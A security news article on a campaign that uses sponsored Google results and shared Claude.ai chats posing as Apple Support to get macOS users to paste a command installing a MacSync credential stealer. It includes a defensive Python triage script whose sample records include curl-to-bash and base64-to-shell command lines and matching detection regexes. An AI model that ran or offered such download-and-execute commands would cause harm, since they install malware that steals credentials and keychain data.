Attackers are currently running a malvertising campaign that uses Google Ads and legitimate shared chats on Claude.ai to spread macOS information-stealing malware. The campaign was identified by Berk Albayrak, security engineer at Trendyol Group, and BleepingComputer independently confirmed a second active version using different infrastructure.
Users searching “download claude mac” may see sponsored Google search results pointing to Claude.ai, so the URL appears legitimate. These links lead to publicly shared Claude chats that pose as official “Claude Code on Mac” installation guides, supposedly from Apple Support. The chats instruct users to open Terminal and paste a command, which then silently downloads and executes the malware.
At the time of writing, two separate shared Claude chats involved in this attack were publicly accessible, each using different domains and payloads but sharing an identical social engineering approach.
How the Claude.ai malvertising attack works
The pasted command downloads a base64-encoded shell script from attacker-controlled domains. One version, flagged by BleepingComputer, retrieves a script called loader.sh from bernasibutuwqu2(.)com, while another, identified by Albayrak, uses customroofingcontractors(.)com.
This loader runs entirely in memory, meaning it leaves minimal traces on disk. The server delivers a unique, obfuscated version of the payload for each request, a technique known as polymorphic delivery. This approach makes signature-based detection much more difficult.
In one variant, attackers profile victims before sending the main payload:
- The script checks whether the machine has Russian or CIS-region keyboard input sources configured. If so, it exits and sends a cis_blocked status ping to the attacker’s server.
- It also collects the external IP address, hostname, operating system version, and keyboard locale, which it then transmits to the attacker.
- It then downloads a second-stage payload that runs through osascript, macOS’s built-in scripting engine. This allows the attacker to execute remote code without dropping a traditional binary.
The variant flagged by Albayrak skips the profiling step and goes directly to execution. It collects browser credentials, cookies, and macOS keychain contents and then exfiltrates this data to the attacker’s server. Albayrak identified this variant as part of the MacSync macOS family of information stealers.
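As an added example (not code from the article, the researchers, or the malware), the following Python triage routine runs over constructed process-execution records and flags the three behaviours described above: base64-decoded content piped straight into a shell, a download piped into a shell, and osascript launched from a shell with inline script text. The record field names, the `example.invalid` host and every sample command line are constructed for this illustration.

```python
import re

# Constructed process-execution events (not taken from the article). Each
# record holds the parent process name, the executed image and the command
# line, roughly the shape an EDR or unified-log export of Terminal activity has.
SAMPLE_EVENTS = [
    {"parent": "Terminal", "image": "/bin/zsh",
     "cmdline": "zsh -c \"echo 'UExBQ0VIT0xERVI=' | base64 -D | sh\""},
    {"parent": "Terminal", "image": "/bin/bash",
     "cmdline": "bash -c 'curl -fsSL https://example.invalid/loader.sh | bash'"},
    {"parent": "sh", "image": "/usr/bin/osascript",
     "cmdline": "osascript -e 'do shell script \"echo stage2\"'"},
    {"parent": "Finder", "image": "/usr/bin/osascript",
     "cmdline": "osascript /Users/me/Library/Scripts/resize.scpt"},
    {"parent": "Terminal", "image": "/bin/zsh",
     "cmdline": "zsh -c 'base64 -D photo.b64 > photo.png'"},
]

SHELLS = {"sh", "bash", "zsh"}
# A pipe whose right-hand side is a shell: the decoded or downloaded bytes
# never touch disk, which is the in-memory loader behaviour described above.
PIPE_TO_SHELL = r"\|\s*(?:/bin/)?(?:ba|z)?sh\b"
RULES = [
    ("base64_decode_piped_to_shell",
     re.compile(r"base64\s+(?:-d|-D|--decode)\b.*" + PIPE_TO_SHELL)),
    ("download_piped_to_shell",
     re.compile(r"\b(?:curl|wget)\b.*" + PIPE_TO_SHELL)),
]

def classify_event(event):
    """Return the names of every rule the event matches (empty if benign)."""
    hits = [name for name, pat in RULES if pat.search(event["cmdline"])]
    # Second stage: osascript spawned by a shell with inline script text,
    # rather than a user running a saved .scpt file from the Finder.
    if (event["image"].endswith("/osascript") and event["parent"] in SHELLS
            and re.search(r"\s-e\s|do shell script", event["cmdline"])):
        hits.append("osascript_inline_from_shell")
    return hits

def triage(events):
    """Map each suspicious command line to its matched rules; benign ones are dropped."""
    return {e["cmdline"]: hits for e in events if (hits := classify_event(e))}

if __name__ == "__main__":
    for cmd, rules in triage(SAMPLE_EVENTS).items():
        print(f"{', '.join(rules)}: {cmd}")
```

The two benign records (a saved script run from the Finder, and a base64 decode written to a file) are deliberately left unflagged so the rules key on the pipe-into-shell and shell-spawned-osascript shapes rather than on base64 or osascript alone.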
Why this Claude.ai malware campaign is harder to detect
Most malvertising campaigns rely on lookalike domains that imitate the real product website. In this case, the campaign uses the legitimate domain claude.ai, because the malicious instructions are hosted on Claude’s shared chat feature.
There is no fake URL to flag as suspicious, and the destination shown in the Google ad is genuine. A similar campaign exploiting ChatGPT and Grok shared chats was reported in December.
How to avoid fake Claude installation malware
Avoid clicking on sponsored search results when searching for software downloads. Instead, go directly to claude.ai to access the official Claude app. Be careful with any instructions that ask you to paste terminal commands, no matter where they appear.
The legitimate Claude Code CLI is available through the official Anthropic documentation and does not require pasting commands from a chat interface.
If a shared Claude chat asks you to run terminal commands attributed to support, treat it as malicious.
BleepingComputer contacted Anthropic and Google for comment before publishing. Neither company has issued a public statement regarding the misuse of shared chats and ad placement at this time.